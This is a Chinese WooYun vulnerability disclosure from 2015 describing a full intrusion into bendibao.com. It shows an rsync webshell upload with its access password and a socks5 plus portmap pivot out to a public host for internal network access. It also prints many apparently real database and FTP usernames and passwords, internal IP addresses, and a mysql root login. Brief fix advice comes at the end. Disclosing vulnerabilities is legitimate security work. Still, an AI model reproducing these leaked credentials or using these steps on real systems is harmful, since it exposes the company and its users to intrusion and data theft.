漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0146277
漏洞标题:本地宝某处漏洞导致内网漫游(涉及数据库及大量源码)
相关厂商:bendibao.com
漏洞作者: 1c3z
提交时间:2015-10-13 10:09
修复时间:2015-10-18 10:10
公开时间:2015-10-18 10:10
漏洞类型:系统/服务运维配置不当
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-13: 细节已通知厂商并且等待厂商处理中
2015-10-18: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
库太多,不知道有多少用户。
详细说明:
rsync www.bendibao.com::
然后找个有写权限的目录把马传上去
rsync -av 1.php www.bendibao.com::webshequ/test/
http://shequ.sz.bendibao.com/test/1.php 密码aa
分站太多了。。
收集下数据库的信息:
这里只是一小部分。。
/web/shequ/config/config_global.php
$_config['db']['1']['dbhost'] = '192.168.1.200';
$_config['db']['1']['dbuser'] = 'bdbshequ';
$_config['db']['1']['dbpw'] = '25411982';
/web/shequ/config/config_global.php
array (
'host' => '192.168.1.110',
'user' => 'xmbdbinfo_user',
'pass' => 'v6fhC69GZFTPXnxu',
'name' => 'tybdbinfo',
),
'dz_db' =>
array (
'host' => '192.168.1.110',
'user' => 'whbdbinfo_db',
'pass' => 'DS7uQMvPT2TT3rWf',
'name' => 'dazhe',
),
/web/wulumuqi/config/system.php
$INI = array (
'db' =>
array (
'host' => '192.168.1.110',
'user' => 'waidibdb_usr',
'pass' => 'FqmbbSBCdtPyM8Cc',
'name' => 'wlmqbdbinfo',
),
/web/chengdu/config/system.php
'db' =>
array (
'host' => '192.168.1.110',
'user' => 'cdbdbinfo_db',
'pass' => 'mtQneVBfCTGcySSH',
'name' => 'cdbdbinfo',
),
'db2' =>
array (
'host' => '192.168.1.110',
'user' => 'whbdbinfo_db',
'pass' => 'DS7uQMvPT2TT3rWf',
'name' => 'postcode',
),
/web/www/config/config_global.php
$_config['db']['1']['dbhost'] = '192.168.1.107';
$_config['db']['1']['dbuser'] = 'bdbshequ';
$_config['db']['1']['dbpw'] = '25411982';
$_config['db']['1']['dbcharset'] = 'utf8';
$_config['db']['1']['pconnect'] = '0';
$_config['db']['1']['dbname'] = 'bdbshequ';
$_config['db']['1']['tablepre'] = 'shequ';
/web/wap/touch/config/sz.php
'db'=>array(
'host'=> '183.60.137.14,2433',
'user'=> 'wsl@bendibao.com',
'password'=> 'wsl@bdb',
'name'=> 'szadinfo',
'provider'=> 'mssql',
/web/wap/touch/config/wh.php
'db'=>array(
'host'=> '183.60.137.17',
'user'=> 'whbdbinfo_db',
'password'=> 'DS7uQMvPT2TT3rWf',
'name'=> 'whbdbinfo',
'provider'=> 'mysql',
),
/web/waidiwap/config/qth_config.php
$INI = array (
'db' =>
array (
'host' => '192.168.1.200',
'user' => 'qthbdbinfo_db',
'pass' => 'xDzQ6T1h3I2h4SsM',
'name' => 'qthbdbinfo',
),
);
ftp用户名密码:
/etc/vsftpd/vuser_passwd.txt 奇行是用户名,偶行是密码
jiahai12
jiahai2541
jiahai
jiahai#2541
xiaohei
xiaohei#2541
wusl
wsl@bdb.2541
yuding
yuding@bdb
hansen
hswhansen77
loutongwh
loutong#3657@hsw
loutongcd
loutong#3657@hsw
haitun
haitun#ht
通关命令netstat -an,发现与内网连接的机子
192.168.1.200:3306
192.168.1.201:3306
192.168.1.110:11211
192.168.1.107:3306
发现一个通用用户名密码
bdbshequ 25411982
菜刀连上,发现都长的差不多,
400多个库
数据库用户也这么多
内网探测下存活主机,扫描有点慢。。
存活主机
扫下http服务
后来测试了下,也就上面跑着一个管理系统,http://192.168.1.168:80/。但是在我这边看起来是坏的。。
接下来端口扫描,但是我没扫。。
插入内网。。
在内网开个socks5的服务
https://gist.github.com/yaonie/2490851
然后用portmap,做端口转发,反弹出来。虽然主机有公网IP,但是好像有墙。
内网机子 python s5.py 8282
再公网主机执行,./portmap -m 2 -p1 2222 -p2 2223
内网,./portmap -m 3 -h1 公网IP -p1 2222 -h2 127.0.0.1 -p2 8282
然后就有了个监听在2223的socks5的服务
配置下proxychains-ng
memcached
rsync 竟然没权限
rsync数据库备份信息
ftp 匿名账号
ftp ,利用前面收集的信息登录
在shell脚本中翻到另一台mysql主机
proxychains4 mysql -h183.60.137.94 -uroot -pbdb#jiahai2541
rsync 183.60.137.17::
另一台公网中的rsync
漏洞证明:
如上
修复方案:
1.不用使用同一个密码
2.rsync要配置密码,最好限制下ip
3.子站子间要隔离好,不然容易一锅端
版权声明:转载请注明来源 1c3z@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-10-18 10:10
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无